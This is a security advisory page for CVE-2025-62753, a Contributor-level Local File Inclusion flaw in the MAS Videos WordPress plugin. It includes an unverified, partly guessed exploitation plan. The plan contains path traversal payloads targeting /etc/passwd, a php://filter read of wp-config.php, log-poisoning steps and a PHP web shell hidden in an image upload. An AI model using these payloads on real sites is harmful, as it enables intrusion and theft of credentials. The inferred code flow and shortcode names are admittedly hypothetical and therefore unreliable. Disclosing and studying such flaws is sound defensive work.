CVE-2025-62753

MAS Videos <= 1.3.2 - Authenticated (Contributor+) Local File Inclusion

highImproper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')
7.5
CVSS Score
7.5
CVSS Score
high
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The MAS Videos plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
High
Privileges Required
Low
User Interaction
None
Scope
Unchanged
High
Confidentiality
High
Integrity
High
Availability

Technical Details

Affected versions<=1.3.2
PublishedDecember 30, 2025
Last updatedJanuary 5, 2026
Affected pluginmasvideos
Research Plan
Unverified

This research plan targets **CVE-2025-62753**, a Local File Inclusion (LFI) vulnerability in the **MAS Videos** plugin for WordPress. ## 1. Vulnerability Summary The **MAS Videos** plugin (versions <= 1.3.2) fails to properly validate or sanitize file paths provided by users before passing them to …

Show full research plan

This research plan targets CVE-2025-62753, a Local File Inclusion (LFI) vulnerability in the MAS Videos plugin for WordPress.

1. Vulnerability Summary

The MAS Videos plugin (versions <= 1.3.2) fails to properly validate or sanitize file paths provided by users before passing them to PHP include or require statements. This vulnerability allows authenticated users with Contributor level permissions or higher to traverse directories and include arbitrary files from the server.

If the included file contains PHP code (e.g., a malicious image upload or a system log), it will be executed. Even without code execution, sensitive files like /etc/passwd or wp-config.php (if the environment allows) can potentially be processed, leading to information disclosure.

2. Attack Vector Analysis

  • User Role: Authenticated (Contributor or higher).
  • Vulnerable Endpoint: Most likely a Shortcode callback or an AJAX action available to authenticated users.
  • Vulnerable Parameter: Likely a parameter named template, style, path, or file.
  • Payload Mechanism: Path traversal sequences (../../) used to escape the intended directory.

3. Code Flow (Inferred)

Based on common LFI patterns in video/e-commerce plugins:

  1. A Contributor user creates a post and inserts a shortcode (e.g., [masvideos_template path="..."]).
  2. The shortcode callback function (likely in includes/class-masvideos-shortcodes.php or similar) retrieves the path attribute.
  3. The plugin calls a template loading function like masvideos_get_template() or wc_get_template() (if based on WooCommerce).
  4. Inside that function, the input is concatenated to a base directory: $file = MASVIDEOS_PLUGIN_DIR . 'templates/' . $user_input . '.php';.
  5. The code executes include( $file ); without validating that $user_input stays within the templates/ directory.

4. Nonce Acquisition Strategy

If the vulnerability is triggered via a shortcode, no nonce is typically required beyond the standard WordPress session. If it is triggered via AJAX:

  1. Identify Action: Search for wp_ajax_ registrations in the plugin:
    grep -rn "wp_ajax_" wp-content/plugins/masvideos/
  2. Identify Nonce Key: Look for wp_create_nonce or check_ajax_referer in the identified handler.
  3. Localize Script: Identify where the nonce is sent to the frontend (usually via wp_localize_script).
    grep -rn "wp_localize_script" wp-content/plugins/masvideos/
  4. Extract via Browser:
    • Create a post with the relevant shortcode to ensure the script is loaded.
    • wp post create --post_type=post --post_status=publish --post_author=[CONTRIBUTOR_ID] --post_content='[masvideos_shortcode_here]'
    • Navigate to the post URL.
    • Use browser_eval("window.masvideos_vars?.nonce") (replace masvideos_vars and nonce with actual keys found in the source).

5. Exploitation Strategy

We will attempt to include /etc/passwd to confirm LFI.

  1. Login as Contributor: Authenticate and obtain session cookies.
  2. Identify Shortcode: Search for shortcodes in the plugin:
    grep -rn "add_shortcode" wp-content/plugins/masvideos/
    (Assume a hypothetical shortcode [masvideos_video] with a template attribute).
  3. Craft Payload:
    [masvideos_video template="../../../../../../../../../../../etc/passwd"]
    Note: If the code appends .php, we may need to test if the environment is susceptible to null byte injection (unlikely in modern PHP) or if there's a way to include an existing file without the extension.
  4. Submit Request:
    • Use http_request to create a "Pending Review" post containing the payload.
    • Use http_request to "Preview" the post.
  5. Target URL: http://localhost:8080/wp-admin/post-new.php or admin-ajax.php.

6. Test Data Setup

  1. Create Contributor:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password
  2. Enable Plugin:
    wp plugin activate masvideos
  3. Identify Target File: Ensure /etc/passwd is readable in the test environment.

7. Expected Results

  • The HTTP response for the post preview should contain the contents of /etc/passwd (e.g., lines starting with root:x:0:0:).
  • If the plugin appends .php, the response might be a "File not found" or a PHP error showing the full path, confirming the traversal: include(/var/www/html/wp-content/plugins/masvideos/templates/../../../../etc/passwd.php).

8. Verification Steps

  1. Check Logs: Use wp-cli to check the error log if the exploit fails to render output:
    tail -n 50 /var/www/html/wp-content/debug.log
  2. Source Code Confirmation: Once access is gained, verify the sink:
    grep -rnE "include|require" wp-content/plugins/masvideos/ | grep "\$"
    Confirm if the variables in these calls are sourced from shortcode_atts or $_REQUEST.

9. Alternative Approaches

  • Null Byte Injection: If on a very old PHP version, try template=../../etc/passwd%00.
  • Wrapper Exploitation: Try PHP filters to read wp-config.php source:
    template=php://filter/convert.base64-encode/resource=../../../../../wp-config.php
  • RCE via Log Poisoning: If the LFI is confirmed, attempt to include /var/log/apache2/access.log or /var/log/nginx/access.log after injecting PHP code into the User-Agent header.
  • RCE via Upload: If the plugin allows Contributors to upload video thumbnails, upload a file named shell.jpg containing <?php system($_GET['cmd']); ?>, then include it via template=../../uploads/masvideos/shell.jpg.
Research Findings
Static analysis — not yet PoC-verified

Summary

The MAS Videos plugin for WordPress (versions up to 1.3.2) contains a Local File Inclusion (LFI) vulnerability that allows authenticated users with Contributor-level permissions or higher to include and execute arbitrary PHP files. This occurs due to inadequate validation of user-provided paths before they are used in file inclusion statements.

Exploit Outline

1. Authenticate to the WordPress site as a user with Contributor or higher privileges. 2. Locate a functional component (such as a shortcode or AJAX handler) that accepts a template or file path parameter (e.g., the 'template' attribute in a video-related shortcode). 3. Inject path traversal sequences (e.g., '../../../../etc/passwd') into the identified parameter to attempt to access files outside the intended directory. 4. To achieve remote code execution, an attacker might include a previously uploaded 'safe' file (like an image) that contains embedded PHP code, or leverage log poisoning techniques to include a system log containing PHP syntax.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.